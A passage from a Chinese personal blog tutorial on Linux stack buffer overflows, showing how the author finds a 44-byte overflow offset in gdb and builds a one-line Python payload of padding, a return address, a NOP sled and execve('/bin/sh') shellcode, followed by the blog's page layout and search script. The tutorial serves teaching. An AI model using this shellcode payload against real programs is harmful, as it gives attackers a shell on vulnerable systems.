alt></p><p>ps：A代表41 B代表42 C代表43<br>这里，我们找到溢出点为44个字节，那么我们就可以确定eip的位置就在 44-48 字节</p><p>然后我们输入：<code>x/50x $esp</code>查看esp寄存器，50为查看数量<br><img src="/images/img/缓冲区溢出/2.png" alt></p><p>我们可以看到43，也就是C刚好就在esp的第一个，那么接下来就可以拼接溢出代码了</p><figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c 'print("A" * 44 + p32(0xbffff080) + "<span class="symbol">\x</span>90" * 100  + "<span class="symbol">\x</span>31<span class="symbol">\x</span>c9<span class="symbol">\x</span>f7<span class="symbol">\x</span>e1<span class="symbol">\x</span>51<span class="symbol">\x</span>68<span class="symbol">\x</span>2f<span class="symbol">\x</span>2f<span class="symbol">\x</span>73<span class="symbol">\x</span>68<span class="symbol">\x</span>68<span class="symbol">\x</span>2f<span class="symbol">\x</span>62<span class="symbol">\x</span>69<span class="symbol">\x</span>6e<span class="symbol">\x</span>89<span class="symbol">\x</span>e3<span class="symbol">\x</span>b0<span class="symbol">\x</span>0b<span class="symbol">\x</span>cd<span class="symbol">\x</span>80")'</span><br></pre></td></tr></table></figure><p>为什么选esp中的0xbffff080地址作为下一跳地址呢？<br>答：因为\x90代表0x90，它不进行任何操作，也不结束，一直向下执行，这样它就可以作为一个滑板，滑进我们的shellcode中了，所以eip的地址只要跳到0x90之中即可。</p></div><div><div><div style="text-align:center;color:#ccc;font-size:14px">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div></div></div><div><div class="my_post_copyright"><script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script><script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script><script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script><p><span>本文标题:</span><a href="/2019/05/21/Linux缓冲区溢出基础.html">Linux缓冲区溢出基础</a></p><p><span>文章作者:</span><a href="/" title="访问 MrLiu 的个人博客">MrLiu</a></p><p><span>发布时间:</span>2019年05月21日 - 16:05</p><p><span>最后更新:</span>2019年05月21日 - 17:05</p><p><span>原始链接:</span><a href="/2019/05/21/Linux缓冲区溢出基础.html" title="Linux缓冲区溢出基础">http://liuhaoan.github.io/2019/05/21/Linux缓冲区溢出基础.html</a><span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://liuhaoan.github.io/2019/05/21/Linux缓冲区溢出基础.html" aria-label="复制成功！"></i></span></p><p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p></div><script>var clipboard=new Clipboard(".fa-clipboard");$(".fa-clipboard").click(function(){clipboard.on("success",function(){swal({title:"",text:"复制成功",icon:"success",showConfirmButton:!0})})})</script></div><div><div style="padding:10px 0;margin:20px auto;width:90%;text-align:center"><div>坚持原创技术分享，您的支持将鼓励我继续创作！</div> <button id="rewardButton" disable="enable" onclick='var qr=document.getElementById("QR");"none"===qr.style.display?qr.style.display="block":qr.style.display="none"'> <span>打赏</span></button><div id="QR" style="display:none"><div id="wechat" style="display:inline-block"> <img id="wechat_qr" src="/images/wechatpay.png" alt="MrLiu 微信支付"><p>微信支付</p></div><div id="alipay" style="display:inline-block"> <img id="alipay_qr" src="/images/alipay.png" alt="MrLiu 支付宝"><p>支付宝</p></div></div></div></div><footer class="post-footer"><div class="post-tags"><a href="/tags/Linux缓冲区溢出/" rel="tag"><i class="fa fa-tag"></i> Linux缓冲区溢出</a></div><div class="post-nav"><div class="post-nav-next post-nav-item"><a href="/2019/05/10/BootStrap前端开发框架的使用.html" rel="next" title="BootStrap前端开发框架的使用"><i class="fa fa-chevron-left"></i> BootStrap前端开发框架的使用</a></div><span class="post-nav-divider"></span><div class="post-nav-prev post-nav-item"></div></div></footer></div></article><div class="post-spread"></div></div></div></div><div class="sidebar-toggle"><div class="sidebar-toggle-line-wrap"><span class="sidebar-toggle-line sidebar-toggle-line-first"></span><span class="sidebar-toggle-line sidebar-toggle-line-middle"></span><span class="sidebar-toggle-line sidebar-toggle-line-last"></span></div></div><aside id="sidebar" class="sidebar"><div class="sidebar-inner"><ul class="sidebar-nav motion-element"><li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap"> 文章目录</li><li class="sidebar-nav-overview" data-target="site-overview-wrap"> 站点概览</li></ul><section class="site-overview-wrap sidebar-panel"><div class="site-overview"><div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person"> <img class="site-author-image" itemprop="image" src="/images/logo.jpg" alt="MrLiu"><p class="site-author-name" itemprop="name">MrLiu</p><p class="site-description motion-element" itemprop="description">记录点滴，成就未来</p></div><nav class="site-state motion-element"><div class="site-state-item site-state-posts"> <a href="/archives/"><span class="site-state-item-count">94</span> <span class="site-state-item-name">日志</span></a></div><div class="site-state-item site-state-categories"> <a href="/categories/index.html"><span class="site-state-item-count">7</span> <span class="site-state-item-name">分类</span></a></div><div class="site-state-item site-state-tags"> <a href="/tags/index.html"><span class="site-state-item-count">166</span> <span class="site-state-item-name">标签</span></a></div></nav><div class="feed-link motion-element"><a href="/atom.xml" rel="alternate"><i class="fa fa-rss"></i> RSS</a></div><div class="links-of-author motion-element"><span class="links-of-author-item"><a href="https://github.com/yourname" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i> GitHub</a></span><span class="links-of-author-item"><a href="https://www.jianshu.com/u/63445e24e8bf" target="_blank" title="简书"><i class="fa fa-fw fa-heartbeat"></i> 简书</a></span><span class="links-of-author-item"><a href="https://juejin.im/user/5a371ae551882512d0607108" target="_blank" title="掘金"><i class="fa fa-fw fa-spinner"></i> 掘金</a></span></div><div id="days"></div><script>function show_date_time(){window.setTimeout("show_date_time()",1e3),BirthDay=new Date("04/05/2019 12:00:00"),today=new Date,timeold=today.getTime()-BirthDay.getTime(),sectimeold=timeold/1e3,secondsold=Math.floor(sectimeold),msPerDay=864e5,e_daysold=timeold/msPerDay,daysold=Math.floor(e_daysold),e_hrsold=24*(e_daysold-daysold),hrsold=setzero(Math.floor(e_hrsold)),e_minsold=60*(e_hrsold-hrsold),minsold=setzero(Math.floor(60*(e_hrsold-hrsold))),seconds=setzero(Math.floor(60*(e_minsold-minsold))),document.getElementById("days").innerHTML="已运行 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分 "+seconds+" 秒"}function setzero(e){return e<10&&(e="0"+e),e}show_date_time()</script></div></section><section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active"><div class="post-toc"><div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#什么是缓冲区溢出？"><span class="nav-number">1.</span> <span class="nav-text">什么是缓冲区溢出？</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#如何实现缓冲区溢出？"><span class="nav-number">2.</span> <span class="nav-text">如何实现缓冲区溢出？</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#下面用一个例子来解释汇编语言"><span class="nav-number">2.0.0.1.</span> <span class="nav-text">下面用一个例子来解释汇编语言</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#下面是反汇编之后的汇编代码"><span class="nav-number">2.0.0.1.1.</span> <span class="nav-text">下面是反汇编之后的汇编代码</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#通过以上的学习，我们就能初步的看懂一些简单的汇编语言了，那么道理如何让缓冲区溢出，并且达到自己想要的目的呢？"><span class="nav-number">2.0.0.2.</span> <span class="nav-text">通过以上的学习，我们就能初步的看懂一些简单的汇编语言了，那么道理如何让缓冲区溢出，并且达到自己想要的目的呢？</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#下面我们通过实验来讲解"><span class="nav-number">2.0.1.</span> <span class="nav-text">下面我们通过实验来讲解</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#分析次程序可知，永远都不可能执行system命令的，但是我们可以通过缓冲区溢出来实现，具体的实现方法有很多种"><span class="nav-number">2.0.1.0.1.</span> <span class="nav-text">分析次程序可知，永远都不可能执行system命令的，但是我们可以通过缓冲区溢出来实现，具体的实现方法有很多种</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#当然根据编译时开启的防护与系统防护的不同，我们使用的方法也不同"><span class="nav-number">2.0.1.1.</span> <span class="nav-text">当然根据编译时开启的防护与系统防护的不同，我们使用的方法也不同</span></a></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#我们就通过找出当前esp地址来实现缓冲区溢出拿shell，这也是最基础的一种方法"><span class="nav-number">2.1.</span> <span class="nav-text">我们就通过找出当前esp地址来实现缓冲区溢出拿shell，这也是最基础的一种方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#首先我们通过gdb反汇编程序，分析一下该程序"><span class="nav-number">2.1.0.1.</span> <span class="nav-text">首先我们通过gdb反汇编程序，分析一下该程序</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#下面我们寻找溢出点"><span class="nav-number">2.1.0.2.</span> <span class="nav-text">下面我们寻找溢出点</span></a></li></ol></li></div></div></section></div></aside></div></main><footer id="footer" class="footer"><div class="footer-inner"><div class="copyright">&copy; <span itemprop="copyrightYear">2019</span><span class="with-love" id="heart"><i class="fa fa-heart"></i></span> <span class="author" itemprop="copyrightHolder">MrLiu</span></div><div class="theme-info"><div class="powered-by"></div> <span class="post-count">博客全站共61.5k字</span></div><div class="busuanzi-count"><script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span class="site-uv"><i class="fa fa-user"></i> 访问人数<span class="busuanzi-value" id="busuanzi_value_site_uv"></span></span><span class="site-pv"><i class="fa fa-eye"></i> 访问总量<span class="busuanzi-value" id="busuanzi_value_site_pv"></span> 次</span></div></div></footer><div class="back-to-top"><i class="fa fa-arrow-up"></i></div></div><script type="text/javascript">"[object Function]"!==Object.prototype.toString.call(window.Promise)&&(window.Promise=null)</script><script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script><script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script><script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script><script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script><script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script><script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script><script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script><script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script><script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script><script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script><script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script><script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script><script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script><script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script><script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script></body></html>